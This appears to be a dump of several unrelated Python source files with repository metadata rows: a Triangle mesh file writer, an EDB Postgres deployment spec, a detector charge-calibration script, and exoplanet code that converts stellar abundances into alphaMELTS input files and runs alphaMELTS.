poly_file = os.fdopen( poly_file, 'w' )
print >> poly_file, '## Written by triangle.py'
__write_node_portion_of_file_to_object( poly_file, points, boundary_indices )
print >> poly_file, ''
print >> poly_file, '## The segments'
print >> poly_file, len( boundary_edges ), len( boundary_edges )
for i, ( e0, e1 ) in enumerate( boundary_edges ):
print >> poly_file, i, e0, e1, 1
print >> poly_file, ''
print >> poly_file, '## The holes'
print >> poly_file, 0
poly_file.close()
return poly_file_name
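# Illustrative layout of the emitted .poly file for a unit square with four
# boundary edges (values shown are examples of what the code above writes):
#   ## The vertices
#   4 2 0 4
#   0 -1 -1 1
#   1 1 -1 1
#   2 1 1 1
#   3 -1 1 1
#   ## The segments
#   4 4
#   0 0 1 1
#   1 1 2 1
#   2 2 3 1
#   3 3 0 1
#   ## The holes
#   0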
def write_node_file( points ):
'''
Given a sequence of 2D points 'points',
writes a '.node' file suitable for passing to 'triangle'
( http://www.cs.cmu.edu/~quake/triangle.node.html )
and returns the path to the '.node' file.
'''
import tempfile
## This only works on Python 2.6+
#node_file = tempfile.NamedTemporaryFile( suffix = '.node', delete = False )
#node_file_name = node_file.name
node_file, node_file_name = tempfile.mkstemp( suffix = '.node' )
node_file = os.fdopen( node_file, 'w' )
print >> node_file, '## Written by triangle.py'
__write_node_portion_of_file_to_object( node_file, points )
node_file.close()
return node_file_name
def read_ele_file( ele_path ):
'''
Reads a '.ele' file generated by 'triangle'.
Returns the list of triangles as indices into the
corresponding '.node' file.
'''
ele_file = open( ele_path )
## Ignore top line.
ele_file.readline()
triangles = []
for line in ele_file:
sline = line.strip().split()
if len( sline ) == 0: continue
if sline[0][0] == '#': continue
triangles.append( tuple([ int( index ) for index in sline[1:4] ]) )
assert len( triangles[-1] ) == 3
ele_file.close()
return triangles
def read_node_file( node_path ):
'''
Reads a '.node' file generated by 'triangle'.
Returns the list of points as tuples.
'''
node_file = open( node_path )
## Ignore top line.
node_file.readline()
triangles = []
for line in node_file:
sline = line.strip().split()
if len( sline ) == 0: continue
if sline[0][0] == '#': continue
triangles.append( tuple([ float( index ) for index in sline[1:4] ]) )
#assert len( triangles[-1] ) == 3
node_file.close()
return triangles
# def main():
# pts = [ ( -1,-1 ), ( 1, -1 ), ( 1, 1 ), ( -1, 1 ), ( 0, 0 ) ]
# edges = [ ( 0, 1 ), ( 1, 2 ), ( 2, 3 ), ( 3, 0 ) ]
#
# ## This isn't very good, because 4 random points may be self-intersecting
# ## when viewed as a polyline loop.
# #import random
# #pts = [ ( random.uniform( -1, 1 ), random.uniform( -1, 1 ) ) for i in xrange(4) ]
#
# print 'pts:', pts
#
# points, triangles = triangles_for_points( pts )
# print 'points (no boundary edges):', points
# print 'triangles (no boundary edges):', triangles
#
# print 'width edges:', edges
# points, triangles = triangles_for_points( pts, edges )
# print 'points (with edges):', points
# print 'triangles (with edges):', triangles
#
# if __name__ == '__main__': main()
| 36.287671 | 215 | 0.630804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,219 | 0.530892 |
1ffe75b4736bb2daa16ad12967f532235a2b0677
| 4,559 |
py
|
Python
|
edbdeploy/spec/baremetal.py
|
vincentp7212/postgres-deployment
|
ea0ed0e06a4eb99cc28600398eddcf2320778113
|
[
"BSD-3-Clause"
] | 58 |
2020-02-24T21:02:50.000Z
|
2022-03-28T14:51:56.000Z
|
edbdeploy/spec/baremetal.py
|
vincentp7212/postgres-deployment
|
ea0ed0e06a4eb99cc28600398eddcf2320778113
|
[
"BSD-3-Clause"
] | 108 |
2020-09-18T12:53:44.000Z
|
2022-02-02T09:02:31.000Z
|
edbdeploy/spec/baremetal.py
|
vincentp7212/postgres-deployment
|
ea0ed0e06a4eb99cc28600398eddcf2320778113
|
[
"BSD-3-Clause"
] | 47 |
2020-03-04T15:51:01.000Z
|
2022-02-27T13:48:05.000Z
|
from . import SpecValidator
BaremetalSpec = {
'EDB-RA-1': {
'ssh_user': SpecValidator(type='string', default=None),
'pg_data': SpecValidator(type='string', default=None),
'pg_wal': SpecValidator(type='string', default=None),
'postgres_server_1': {
'name': SpecValidator(type='string', default='pg1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pem_server_1': {
'name': SpecValidator(type='string', default='pem1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'backup_server_1': {
'name': SpecValidator(type='string', default='backup1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
}
},
'EDB-RA-2': {
'ssh_user': SpecValidator(type='string', default=None),
'pg_data': SpecValidator(type='string', default=None),
'pg_wal': SpecValidator(type='string', default=None),
'postgres_server_1': {
'name': SpecValidator(type='string', default='pg1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_2': {
'name': SpecValidator(type='string', default='pg2'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_3': {
'name': SpecValidator(type='string', default='pg3'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pem_server_1': {
'name': SpecValidator(type='string', default='pem1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'backup_server_1': {
'name': SpecValidator(type='string', default='backup1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
}
},
'EDB-RA-3': {
'ssh_user': SpecValidator(type='string', default=None),
'pg_data': SpecValidator(type='string', default=None),
'pg_wal': SpecValidator(type='string', default=None),
'postgres_server_1': {
'name': SpecValidator(type='string', default='pg1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_2': {
'name': SpecValidator(type='string', default='pg2'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_3': {
'name': SpecValidator(type='string', default='pg3'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pooler_server_1': {
'name': SpecValidator(type='string', default='pooler1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pooler_server_2': {
'name': SpecValidator(type='string', default='pooler2'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pooler_server_3': {
'name': SpecValidator(type='string', default='pooler3'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pem_server_1': {
'name': SpecValidator(type='string', default='pem1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'backup_server_1': {
'name': SpecValidator(type='string', default='backup1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
}
}
}
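# Illustrative sketch only (not part of edb-deploy's API): one way a caller might flatten a
# reference-architecture spec above into the dotted paths that expect a value. The helper
# name and the flattening idea are assumptions added for illustration.
def _iter_spec_paths(spec, prefix=''):
    """Yield 'a.b.c' style paths for every SpecValidator leaf of a nested spec dict."""
    for key, value in spec.items():
        path = "{}.{}".format(prefix, key) if prefix else key
        if isinstance(value, SpecValidator):
            yield path
        elif isinstance(value, dict):
            # recurse into nested server/section dicts
            for sub_path in _iter_spec_paths(value, path):
                yield sub_path
# Example usage: list every field expected by the 'EDB-RA-1' architecture.
# for p in _iter_spec_paths(BaremetalSpec['EDB-RA-1']):
#     print(p)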
| 45.59 | 68 | 0.573591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,351 | 0.296337 |
1ffec07dcf5a4c57c0d689934f15fff735336375
| 2,382 |
py
|
Python
|
ml-scripts/ss_calib/scripts/ss_charge_cali.py
|
YashengFu/exo-200_scripts
|
d33a1a2eeda5f072409656b96e8730f2de53ee0b
|
[
"MIT"
] | null | null | null |
ml-scripts/ss_calib/scripts/ss_charge_cali.py
|
YashengFu/exo-200_scripts
|
d33a1a2eeda5f072409656b96e8730f2de53ee0b
|
[
"MIT"
] | null | null | null |
ml-scripts/ss_calib/scripts/ss_charge_cali.py
|
YashengFu/exo-200_scripts
|
d33a1a2eeda5f072409656b96e8730f2de53ee0b
|
[
"MIT"
] | null | null | null |
import numpy as np
import time
import argparse
import pandas as pd
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from scipy import special
from tqdm import tqdm
from scipy.optimize import curve_fit
from utils.build_hist import build_hist
class SS_Charge:
"""
read calibration data and use SS event get calibrate constants
"""
def __init__(self,file_path,input_files):
self.file_path = file_path
self.input_files = input_files
self.df_data = self.get_data(input_files)
self.cluster_energy = []
def get_data(self,input_files):
df_all =[]
file_index = 0
for index in range(len(input_files)):
df = pd.read_hdf(self.file_path+input_files[index])
df = df.reset_index()
df['entry'] = df['entry']+file_index
df = df.set_index(["entry"])
file_index+= len(df['label'])
df_all.append(df)
df_total = pd.concat(df_all)
return df_total
def select_ss_data(self,ss_type=1):
c_energy = []
        select_data = self.df_data[self.df_data['ss_type'] == ss_type]  # honor the ss_type argument
print('%s events are %d'%(ss_type,select_data.shape[0]))
for index in tqdm(set(select_data.index.get_level_values('entry').values), mininterval=1, leave=False):
variables = [float(i) for i in select_data["report"][index].split()]
c_energy.append(variables[-1])
self.cluster_energy=c_energy
def check_data(self):
hist_data,bin_edges,patches = plt.hist(self.cluster_energy,bins=np.arange(0,3001,6),label='cluster_energy',histtype='step',alpha=0.9,linewidth=1,edgecolor='blue',density=False)
bin_centers = 0.5*(bin_edges[1:] + bin_edges[:-1])
bin_centers = np.array(bin_centers)
return bin_centers, hist_data
def root_fit(self):
c_hist = build_hist(self.cluster_energy)
return c_hist
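# Hedged sketch (not from the original module): the __main__ block below calls fit_data(),
# which is not defined in this snippet. Assuming the photopeak is fit with a Gaussian plus a
# flat background via scipy.optimize.curve_fit, a minimal stand-in could look like this;
# the fit window and initial guesses are assumptions for illustration only.
def _example_peak_fit(bin_centers, hist_data, window=(2500.0, 2700.0)):
    """Fit a Gaussian + constant background to the histogram inside `window` (assumed keV range)."""
    def model(x, amp, mu, sigma, bkg):
        return amp * np.exp(-0.5 * ((x - mu) / sigma) ** 2) + bkg
    mask = (bin_centers > window[0]) & (bin_centers < window[1])
    x, y = bin_centers[mask], hist_data[mask]
    p0 = [y.max(), x[np.argmax(y)], 30.0, max(y.min(), 0.0)]  # rough starting values
    popt, pcov = curve_fit(model, x, y, p0=p0)
    perr = np.sqrt(np.diag(pcov))
    return x, y, popt, perr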
if __name__ == "__main__":
start_time = time.time()
test_object = SS_Charge("/dybfs2/nEXO/fuys/EXO-200/shape_agreement/2019_0vbb/Phase1/fv_162_10_182_173_3d0.6/data/ml_rec_data/",["run_6255_ml.h5"])
test_object.select_ss_data(1)
bin_centers, hist_data = test_object.check_data()
    # NOTE: fit_data() is not defined in this snippet; _example_peak_fit() above sketches one
    # possible implementation (Gaussian photopeak + flat background via curve_fit).
    bin_centers, hist_data, bin_centers_mask, c_energy_mask, popt, perr = test_object.fit_data()
    print(f"time costs: {(time.time() - start_time)/60} min")
| 38.419355 | 184 | 0.673804 | 1,661 | 0.697313 | 0 | 0 | 0 | 0 | 0 | 0 | 358 | 0.150294 |
1fff4ed247e76eafdf9461ae3d7ab7dc88f2b73c
| 97,747 |
py
|
Python
|
ExoplanetPocketknife.py
|
ScottHull/Exoplanet-Pocketknife
|
15b49ff3612adc3b31a78c27379fb8b2f47c6c8f
|
[
"CC0-1.0"
] | null | null | null |
ExoplanetPocketknife.py
|
ScottHull/Exoplanet-Pocketknife
|
15b49ff3612adc3b31a78c27379fb8b2f47c6c8f
|
[
"CC0-1.0"
] | null | null | null |
ExoplanetPocketknife.py
|
ScottHull/Exoplanet-Pocketknife
|
15b49ff3612adc3b31a78c27379fb8b2f47c6c8f
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
# /// The Exoplanet Pocketknife
# /// Scott D. Hull, The Ohio State University 2015-2017
# /// All usage must include proper citation and a link to the Github repository
# /// https://github.com/ScottHull/Exoplanet-Pocketknife
import os, csv, time, sys, shutil, subprocess
from threading import Timer
from math import *
import pandas as pd
import matplotlib.pyplot as plt
from scipy import integrate as inte
import numpy as np
import bisect
bsp_run = False
morb_run = False
gravity = 9.8
# plate_thickness = 10.0 # This is in km!
plate_thickness = 10 * 1000 # This is in m!
na_atwt = 22.98976928
mg_atwt = 24.305
al_atwt = 26.9815386
si_atwt = 28.0855
ca_atwt = 40.078
ti_atwt = 47.867
cr_atwt = 51.9961
fe_atwt = 55.845
ni_atwt = 58.6934
na2o_molwt = 61.9785
mgo_molwt = 40.3040
al2o3_molwt = 101.9601
sio2_molwt = 60.0835
cao_molwt = 56.0770
tio2_molwt = 79.8650
cr2o3_molwt = 151.9892
feo_molwt = 71.8440
nio_molwt = 74.6924
fe2o3_molwt = 159.687
num_na2o_cations = 2
num_mgo_cations = 1
num_al2o3_cations = 2
num_sio2_cations = 1
num_cao_cations = 1
num_tio2_cations = 1
num_cr2o3_cations = 2
num_feo_cations = 1
num_nio_cations = 1
num_fe2o3_cations = 2
asplund_na = 1479108.388
asplund_mg = 33884415.61
asplund_al = 2344228.815
asplund_si = 32359365.69
asplund_ca = 2041737.945
asplund_ti = 79432.82347
asplund_cr = 436515.8322
asplund_fe = 28183829.31
asplund_ni = 1698243.652
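# The asplund_* values above appear to be linear solar photospheric abundances, i.e. 10**A(X)
# from the Asplund et al. solar composition (e.g. 10**7.45 ~= 2.8e7 for Fe); the exact
# reference is an assumption of this comment rather than something stated in the code.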
asplund_sivsfe = asplund_si / asplund_fe
asplund_navsfe = asplund_na / asplund_fe
mcd_earth_fe = 29.6738223341739
mcd_earth_na = 0.40545783900173
mcd_earth_mg = 32.812015232308
mcd_earth_al = 3.05167459380979
mcd_earth_si = 29.6859892035662
mcd_earth_ca = 2.20951970229211
mcd_earth_ni = 1.60579436264263
mcd_earth_ti = 0.0876307681103416
mcd_earth_cr = 0.468095964095391
mc_earth_ni = 1.60579436264263
mcd_sivsfe = mcd_earth_si / mcd_earth_fe
mcd_navsfe = mcd_earth_na / mcd_earth_fe
adjust_si = mcd_sivsfe / asplund_sivsfe
adjust_na = mcd_navsfe / asplund_navsfe
modelearth_mgo = 11.84409812845
gale_mgo = 7.65154964069009
mgo_fix = gale_mgo / modelearth_mgo
depth_trans_zone = [0, 6, 19.7, 28.9, 36.4, 43.88, 51.34, 58.81, 66.36, 73.94, 81.5, 88.97, 96.45, 103.93, 111.41,
118.92, 126.47, 134.01, 141.55, 149.09, 156.64, 164.18, 171.72, 179.27, 186.79, 194.27, 201.75,
209.23, 216.71, 224.09, 231.4, 238.7, 246.01, 253.31, 260.62, 267.9, 275.16, 282.42, 289.68,
296.94, 304.19, 311.41, 318.44, 325.47, 332.5, 339.53, 346.56, 353.59, 360.62, 367.66, 374.69,
381.72, 388.75, 395.78, 402.78, 409.72, 416.67, 423.61, 430.56, 437.5, 444.44, 451.32, 457.89,
464.47, 471.05, 477.63, 484.21, 490.79, 497.37, 503.75, 510, 516.25, 522.5, 528.75, 535, 541.25,
547.5, 553.95, 560.53, 567.11, 573.68]
inputfile_list = []
home_dir = []
# star_names = []
# na_h = []
# mg_h = []
# al_h = []
# si_h = []
# ca_h = []
# ti_h = []
# cr_h = []
# fe_h = []
#
# star_index = []
# na_index = []
# mg_index = []
# al_index = []
# si_index = []
# ca_index = []
# ti_index = []
# cr_index = []
# fe_index = []
#
# na_mol_abundances = []
# mg_mol_abundances = []
# al_mol_abundances = []
# si_mol_abundances = []
# ca_mol_abundances = []
# ti_mol_abundances = []
# cr_mol_abundances = []
# fe_mol_abundances = []
def adjustsi_fct(si_pct):
adj_si_pct = si_pct * adjust_si
return adj_si_pct
def adjustna_fct(na_pct):
adj_na_pct = na_pct * adjust_na
return adj_na_pct
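# The two helpers above rescale a star's Si and Na cation fractions by the ratio of the
# model-Earth Si/Fe and Na/Fe ratios (mcd_earth_*) to the solar ones (asplund_*), i.e. they
# impose on the model planet the same Si and Na depletion that the Earth shows relative to the Sun.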
def createbspenvfile():
if "BSP_Env_File" in os.listdir(os.getcwd()):
pass
else:
bspenvfile = open("BSP_Env_File", 'w')
one = "!BSP_Environment_File"
two = "ALPHAMELTS_VERSION MELTS"
three = "ALPHAMELTS_MODE isobaric"
four = "ALPHAMELTS_MAXT 3000"
five = "ALPHAMELTS_DELTAT -2"
six = "ALPHAMELTS_MINT 1020"
seven = "ALPHAMELTS_FRACTIONATE_SOLIDS true"
eight = "ALPHAMELTS_CELSIUS_OUTPUT true"
nine = "ALPHAMELTS_SAVE_ALL true"
ten = "ALPHAMELTS_SKIP_FAILURE true"
eleven = "Suppress: alloy-liquid"
bspenvfile.write("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(one, two, three,
four, five, six, seven, eight, nine,
ten, eleven))
bspenvfile.close()
def createmorbenvfile():
if "MORB_Env_File" in os.listdir(os.getcwd()):
pass
else:
morbenvfile = open("MORB_Env_File", 'w')
one = "!MORB_Environment_File"
two = "ALPHAMELTS_VERSION pMELTS"
three = "ALPHAMELTS_MODE isobaric"
four = "ALPHAMELTS_MAXT 3000"
five = "ALPHAMELTS_DELTAT -2"
six = "ALPHAMELTS_MINT 1000"
seven = "ALPHAMELTS_FRACTIONATE_SOLIDS true"
eight = "ALPHAMELTS_CELSIUS_OUTPUT true"
nine = "ALPHAMELTS_SAVE_ALL true"
ten = "ALPHAMELTS_SKIP_FAILURE true"
eleven = "Suppress: alloy-liquid"
morbenvfile.write("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(one, two, three,
four, five, six, seven, eight, nine,
ten, eleven))
morbenvfile.close()
def runmelts_bsp(infile_directory, inputfilename):
print("\n[~] Preparing alphaMELTS for BSP calculations...")
if "{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]) in os.listdir(os.getcwd()):
shutil.rmtree("{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
os.mkdir("{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
else:
os.mkdir("{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
bsp_outdir = (home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(inputfilename[:-4]))
for i in os.listdir(infile_directory):
os.chdir(home_dir[0])
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
os.remove("alphaMELTS_tbl.txt")
else:
pass
shutil.copy((infile_directory + "/" + str(i)), (home_dir[0] + "/" + str(i)))
print("[~] Running BSP calculations for: {}".format(i[:-20]))
p = subprocess.Popen(["run_alphamelts.command", "-f", "BSP_Env_File"], stdin=subprocess.PIPE)
t = Timer(300, p.kill)
t.start()
print("\nTimeout timer started. 300 seconds until the loop continues...\n")
p.communicate(input=b"\n".join([b"1", i, b"8", b"alloy-liquid", b"0", b"x", b"5", b"4", b"-1.4", b"2", b"2500", b"4200", b"4", b"1", b"0"]))
t.cancel()
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
oldname = "alphaMELTS_tbl.txt"
newname = i[:-20] + "_BSP_OUTPUT"
os.rename(oldname, newname)
shutil.move(newname, bsp_outdir + "/{}".format(newname))
os.remove(i)
os.chdir(bsp_outdir)
csv_file_name = newname + ".csv"
with open(newname, 'r') as infile, open(csv_file_name, 'w') as outfile:
in_txt = csv.reader(infile, delimiter=" ")
out_csv = csv.writer(outfile)
out_csv.writerows(in_txt)
infile.close()
outfile.close()
os.remove(newname)
print("[~] {} BSP calculation processed!".format(i[:-20]))
else:
print("\n[X] {} BSP calculation FAILED!".format(i[:-20]))
pass
        if i in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}".format(i))
else:
pass
print("[~] Scraping BSP files for alloy abundances...")
return ("{}_Completed_BSP_MELTS_Files".format(inputfilename))
def file_consolidate(path, init_path):
os.chdir(path)
if "EP_Consolidated_Output.csv" is os.listdir(os.getcwd()):
os.remove("EP_Consolidated_Output.csv")
else:
pass
if "EP_Consolidated_Output.csv" is os.listdir(init_path):
os.remove(init_path + "/EP_Consolidated_Output.csv")
else:
pass
outfile = open("EP_Consolidated_Output.csv", 'a')
for i in os.listdir(os.getcwd()):
if i != "EP_Consolidated_Output.csv":
with open(i, 'r') as infile:
reader = csv.reader(infile, delimiter=",")
read_row = []
for row in reader:
for p in row:
read_row.append(p)
writethis = ",".join(str(z) for z in read_row)
outfile.write("{}\n".format(writethis))
os.remove(i)
now_dir = os.getcwd() + "/{}".format("EP_Consolidated_Output.csv")
now_dir2 = os.getcwd()
to_dir = init_path + "/{}".format("EP_Consolidated_Output.csv")
shutil.move(now_dir, to_dir)
os.chdir(init_path)
shutil.rmtree(now_dir2)
print("[~] Consolidated file '{}' has been written!\n(Please see '{}' for your "
"file!)\n".format("EP_Consolidated_Output.csv", init_path))
def logep(infile, infile_type, consol_file, init_path, library):
if "{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type) in os.listdir(os.getcwd()):
shutil.rmtree("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
else:
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
if "{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type) in os.listdir(os.getcwd()):
os.remove("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
else:
pass
chem_outfile = open("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type), 'a')
chem_outfile.write("Star,FeO,CaO,Al2O3,Na2O,MgO,SiO2,TiO2,Cr2O3,NiO,Mass_Alloy\n")
# try:
with open(infile, 'r') as inputfile:
if library is True:
print("\n[~] Writing MELTS {} Input Files...".format(infile_type))
else:
print("[~] Preparing consolidated MELTS output file...")
df = pd.DataFrame(pd.read_csv(inputfile))
for index, row in df.iterrows():
star_name = row['Star']
# print(star_name)
# print(row['[Fe/H]'])
# print(row['[Ca/H]'])
# print(row['[Al/H]'])
# print(row['[Na/H]'])
# print(row['[Mg/H]'])
# print(row['[Si/H]'])
# print(row['[Ti/H]'])
# print(row['[Cr/H]'])
# print(row['[Ni/H'])
fe_abundance = (10 ** (row['[Fe/H]'])) * asplund_fe
ca_abundance = (10 ** (row['[Ca/H]'])) * asplund_ca
al_abundance = (10 ** (row['[Al/H]'])) * asplund_al
na_abundance = (10 ** (row['[Na/H]'])) * asplund_na
mg_abundance = (10 ** (row['[Mg/H]'])) * asplund_mg
si_abundance = (10 ** (row['[Si/H]'])) * asplund_si
ti_abundance = (10 ** (row['[Ti/H]'])) * asplund_ti
cr_abundance = (10 ** (row['[Cr/H]'])) * asplund_cr
ni_abundance = (10 ** (row['[Ni/H]'])) * asplund_ni
total_abundances = (fe_abundance + ca_abundance + al_abundance + na_abundance + mg_abundance +
si_abundance + ti_abundance + cr_abundance + ni_abundance)
# print(total_abundances)
init_pct_fe = fe_abundance / total_abundances
init_pct_ca = ca_abundance / total_abundances
init_pct_al = al_abundance / total_abundances
init_pct_na = na_abundance / total_abundances
init_pct_mg = mg_abundance / total_abundances
init_pct_si = si_abundance / total_abundances
init_pct_ti = ti_abundance / total_abundances
init_pct_cr = cr_abundance / total_abundances
init_pct_ni = ni_abundance / total_abundances
init_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + init_pct_na + init_pct_mg + init_pct_si +
init_pct_ti + init_pct_cr + init_pct_ni)
# print(star_name)
# print(init_pct_fe, init_pct_ca, init_pct_al, init_pct_na, init_pct_mg, init_pct_si,
# init_pct_ti, init_pct_cr, init_pct_ni ,init_pct_sum)
moles_si_remaining = adjustsi_fct(si_pct=init_pct_si)
moles_na_remaining = adjustna_fct(na_pct=init_pct_na)
norm_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + moles_na_remaining + init_pct_mg +
moles_si_remaining + init_pct_ti + init_pct_cr + init_pct_ni)
norm_pct_fe = init_pct_fe / norm_pct_sum
norm_pct_ca = init_pct_ca / norm_pct_sum
norm_pct_al = init_pct_al / norm_pct_sum
norm_pct_na = moles_na_remaining / norm_pct_sum
norm_pct_mg = init_pct_mg / norm_pct_sum
norm_pct_si = moles_si_remaining / norm_pct_sum
norm_pct_ti = init_pct_ti / norm_pct_sum
norm_pct_cr = init_pct_cr / norm_pct_sum
norm_pct_ni = init_pct_ni / norm_pct_sum
check_norm_sum = (
norm_pct_fe + norm_pct_ca + norm_pct_al + norm_pct_na + norm_pct_mg + norm_pct_si +
norm_pct_ti + norm_pct_cr + norm_pct_ni)
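            # Convert normalized cation mole fractions to (relative) oxide masses:
            # wt_oxide = moles_cation * oxide_molwt / cations_per_formula_unit, which is just
            # moles_oxide * oxide_molwt (the atomic-weight factors below cancel).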
wt_feo = ((norm_pct_fe * fe_atwt) * feo_molwt) / (num_feo_cations * fe_atwt)
wt_cao = ((norm_pct_ca * ca_atwt) * cao_molwt) / (num_cao_cations * ca_atwt)
wt_al2o3 = ((norm_pct_al * al_atwt) * al2o3_molwt) / (num_al2o3_cations * al_atwt)
wt_na2o = ((norm_pct_na * na_atwt) * na2o_molwt) / (num_na2o_cations * na_atwt)
wt_mgo = ((norm_pct_mg * mg_atwt) * mgo_molwt) / (num_mgo_cations * mg_atwt)
wt_sio2 = ((norm_pct_si * si_atwt) * sio2_molwt) / (num_sio2_cations * si_atwt)
wt_tio2 = ((norm_pct_ti * ti_atwt) * tio2_molwt) / (num_tio2_cations * ti_atwt)
wt_cr2o3 = ((norm_pct_cr * cr_atwt) * cr2o3_molwt) / (num_cr2o3_cations * cr_atwt)
wt_nio = ((norm_pct_ni * ni_atwt) * nio_molwt) / (num_nio_cations * ni_atwt)
sum_oxwts = (wt_feo + wt_cao + wt_al2o3 + wt_na2o + wt_mgo + wt_sio2 + wt_tio2 + wt_cr2o3 + wt_nio)
norm_wt_feo = (wt_feo / sum_oxwts) * 100.0
norm_wt_cao = (wt_cao / sum_oxwts) * 100.0
norm_wt_al2o3 = (wt_al2o3 / sum_oxwts) * 100.0
norm_wt_na2o = (wt_na2o / sum_oxwts) * 100.0
norm_wt_mgo = (wt_mgo / sum_oxwts) * 100.0
norm_wt_sio2 = (wt_sio2 / sum_oxwts) * 100.0
norm_wt_tio2 = (wt_tio2 / sum_oxwts) * 100.0
norm_wt_cr2o3 = (wt_cr2o3 / sum_oxwts) * 100.0
norm_wt_nio = (wt_nio / sum_oxwts) * 100.0
norm_wt_sum_check = (norm_wt_feo + norm_wt_cao + norm_wt_al2o3 + norm_wt_na2o + norm_wt_mgo +
norm_wt_sio2 + norm_wt_tio2 + norm_wt_cr2o3 + norm_wt_nio)
# print(star_name)
# print(norm_wt_feo, norm_wt_cao, norm_wt_al2o3, norm_wt_na2o, norm_wt_mgo, norm_wt_sio2,
# norm_wt_tio2, norm_wt_cr2o3, norm_wt_nio, norm_wt_sum_check)
if (star_name + "_MELTS_{}_INFILE.txt".format(infile_type)) in os.listdir(os.getcwd()):
os.remove(star_name + "_MELTS_{}_INFILE.txt".format(infile_type))
else:
pass
melts_input_file = open(star_name + "_MELTS_{}_INFILE.txt".format(infile_type), 'w')
title = "Title: {}".format(star_name)
initfeo = "Initial Composition: FeO {}".format(norm_wt_feo)
initcao = "Initial Composition: Cao {}".format(norm_wt_cao)
inital2o3 = "Initial Composition: Al2O3 {}".format(norm_wt_al2o3)
initna2o = "Initial Composition: Na2O {}".format(norm_wt_na2o)
initmgo = "Initial Composition: MgO {}".format(norm_wt_mgo)
initsio2 = "Initial Composition: SiO2 {}".format(norm_wt_sio2)
inittio2 = "Initial Composition: TiO2 {}".format(norm_wt_tio2)
initcr2o3 = "Initial Composition: Cr2O3 {}".format(norm_wt_cr2o3)
initnio = "Initial Composition: NiO {}".format(norm_wt_nio)
init_temp = 'Initial Temperature: 2000'
final_temp = "Final Temperature: 800"
inc_temp = "Increment Temperature: -5"
init_press = "Initial Pressure: 500"
final_press = "Final Pressure: 500"
dpdt = "dp/dt: 0"
mode = "Mode: Fractionate Solids"
mode2 = "Mode: Isobaric"
melts_input_file.write(
"{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(title,
initfeo,
initcao,
inital2o3,
initna2o,
initmgo,
initsio2,
inittio2,
initcr2o3,
initnio,
init_temp,
final_temp,
inc_temp,
init_press,
final_press,
dpdt, mode,
mode2))
melts_input_file.close()
shutil.move((os.getcwd() + "/" + star_name + "_MELTS_{}_INFILE.txt".format(infile_type)),
(os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type)
+ star_name + "_MELTS_{}_INFILE.txt".format(infile_type)))
chem_outfile.write("{},{},{},{},{},{},{},{},{},{}\n".format(star_name, norm_wt_feo, norm_wt_cao, norm_wt_al2o3,
norm_wt_na2o, norm_wt_mgo, norm_wt_sio2, norm_wt_tio2, norm_wt_cr2o3, norm_wt_nio))
chem_outfile.close()
if library is True:
infiledir = (os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type))
print("[~] MELTS {} Input Files Written!".format(infile_type))
print("[~] MELTS files stored in {}".format(infiledir))
else:
pass
infiledir = (os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type))
print("[~] Launching alphaMELTS for {} Calculations...".format(infile_type))
runmelts_bsp(infile_directory=infiledir, inputfilename=infile)
chem_outfile.close()
